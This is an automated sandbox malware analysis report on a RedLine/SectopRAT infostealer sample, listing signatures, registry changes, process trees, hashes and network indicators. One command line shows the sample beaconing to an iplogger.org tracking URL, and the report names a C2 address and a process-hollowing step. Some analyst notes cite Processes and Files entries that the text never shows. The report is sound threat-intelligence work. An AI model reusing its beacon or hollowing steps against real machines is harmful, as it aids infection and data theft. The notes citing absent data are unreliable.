Malware Analysis Report

2024-11-30 18:58

Sample ID 240315-vp9c5sdg81
Target cbf6b34e875fcf4e8a5a869f38801897
SHA256 0e472b9ec55d56c5679c755dc82a1206a0e77a1160634c36544cb803989ea8e3
Tags: redline sectoprat build2_mastif agilenet infostealer persistence rat trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256 0e472b9ec55d56c5679c755dc82a1206a0e77a1160634c36544cb803989ea8e3

Threat Level: Known bad

The file cbf6b34e875fcf4e8a5a869f38801897 was found to be: Known bad.

Malicious Activity Summary

redline sectoprat build2_mastif agilenet infostealer persistence rat trojan

SectopRAT

RedLine payload

RedLine

SectopRAT payload

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 17:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 17:11

Reported

2024-03-15 17:13

Platform

win7-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2728 set thread context of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{05F20BD1-E2EF-11EE-9249-E299A69EE862} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "416684543" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0820dddfb76da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fffacc0240230f40b575ac5982df49bd00000000020000000000106600000001000020000000326e35b5665992e20da2ee4cc8fe2843d78bdb922f02cff9390270e895f77d9b000000000e80000000020000200000005d95980e531beae7148c0af768c670e4c2095c39d9c4b0bd1ef60919fc77e45c200000006944b451ccb4d1026ee5175562aa93e18a49efda8a7ede66744b71f0972a33b7400000006012174b8eff7253d6c1cbebb552a70a8b7a45411bc21a76500ec750e63d3e882b1f9a587f780f5ad20f2fa63f97f37720033a00d916145160245bbd226a73a0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe (x7)
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe (x7)
PID 2020 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe (x4)
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE (x7)
PID 2616 wrote to memory of 2416 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (x4)
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE (x7)
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE (x12)

Processes

C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS4A49.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1XQju7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2616 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

Network

Country Destination Domain Proto Count
US 8.8.8.8:53 iplogger.org udp (x1)
US 104.21.4.208:443 iplogger.org tcp (x2)
US 8.8.8.8:53 apps.identrust.com udp (x2)
GB 96.17.179.184:80 apps.identrust.com tcp (x2)
US 8.8.8.8:53 x2.c.lencr.org udp (x1)
GB 173.222.13.40:80 x2.c.lencr.org tcp (x1)
RU 95.181.157.69:8552 - tcp (x17)
US 204.79.197.200:443 ieonline.microsoft.com tcp (x3)

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

MD5 3973c47bf5f334ea720a9d603d2c6510
SHA1 bf2b72dc12d4d41e08b452e465c40d010b2aba4e
SHA256 4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea
SHA512 cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

C:\Users\Admin\AppData\Local\Temp\7zS4A49.tmp\Install.cmd

MD5 21661026606353f423078c883708787d
SHA1 338e288b851e0e5bee26f887e50bfcd8150e8257
SHA256 6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782
SHA512 61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 0c6ef320b361f01d63147dec80c3f34c
SHA1 c04adc3da100118f72e41c1c4645cbf8fa813cee
SHA256 bf89a45619528967430c483c01da54306e4f1b200a8c062697218fdd60bac93f
SHA512 f204ea35dffab3bd703ccf3a52e8ce26be5cde8f24b485b8a0c34a7dc9948bfcae3c7d2d268d5e4fd736dd55245ee995a4bfe0726e2b7fbb379095c69e9ddb69

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 398ad49b9ebee2ce6433cb56a9f91338
SHA1 cde7094eb7c29d9922ee38bfb0cb10bd5eff0c34
SHA256 ca258df261b9af13849a1e8a08b5f4a963a6ab8912ffe754d461ff25a110c90a
SHA512 5397cec77fcc82544ad37daed3a5fb39faf8185e75597b600a084c246723f75d41299c5e3485d3230224319e28d3db6066f3e477039103f08baa81fbe613b3fc

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 17:11

Reported

2024-03-15 17:13

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe N/A
Note: wextract_cleanup0 is the self-cleanup entry that the IExpress/wextract SFX wrapper writes for itself: advpack.dll,DelNodeRunDLL32 deletes the IXP000.TMP extraction directory at the next logon and starts nothing. The hit reflects the packaging, not persistence of the dropped payload; no other autostart entry appears in the behavioral2 tables.

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
Note: the hits match the three iplogger.org rows in the Network table below (one DNS lookup, two TLS sessions to 104.21.4.208) and stem from Install.cmd launching msedge.exe on https://iplogger.org/1XQju7 (see Processes). iplogger.org is a link-tracking service that logs the visitor's IP address, so the browser visit acts as an infection beacon for the operator rather than as a download of further code.

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1896 set thread context of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
Note: process and target are the same image: RUNTIM~1.EXE (PID 1896) started a second instance of itself (PID 4384) and reset its thread context, the RunPE/process-hollowing pattern common in .NET loaders (RUNTIM~1.EXE is a 32-bit .NET executable; see the CLR_v4.0_32\UsageLogs\RUNTIM~1.EXE.log entry under Files). The region dumped from PID 4384 at 0x00400000-0x0041E000 (also under Files) covers the default 32-bit image base and is the first dump to inspect for the unpacked RedLine/SectopRAT payload.

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 4196 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4420 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4420 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 4888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4196 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4868 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
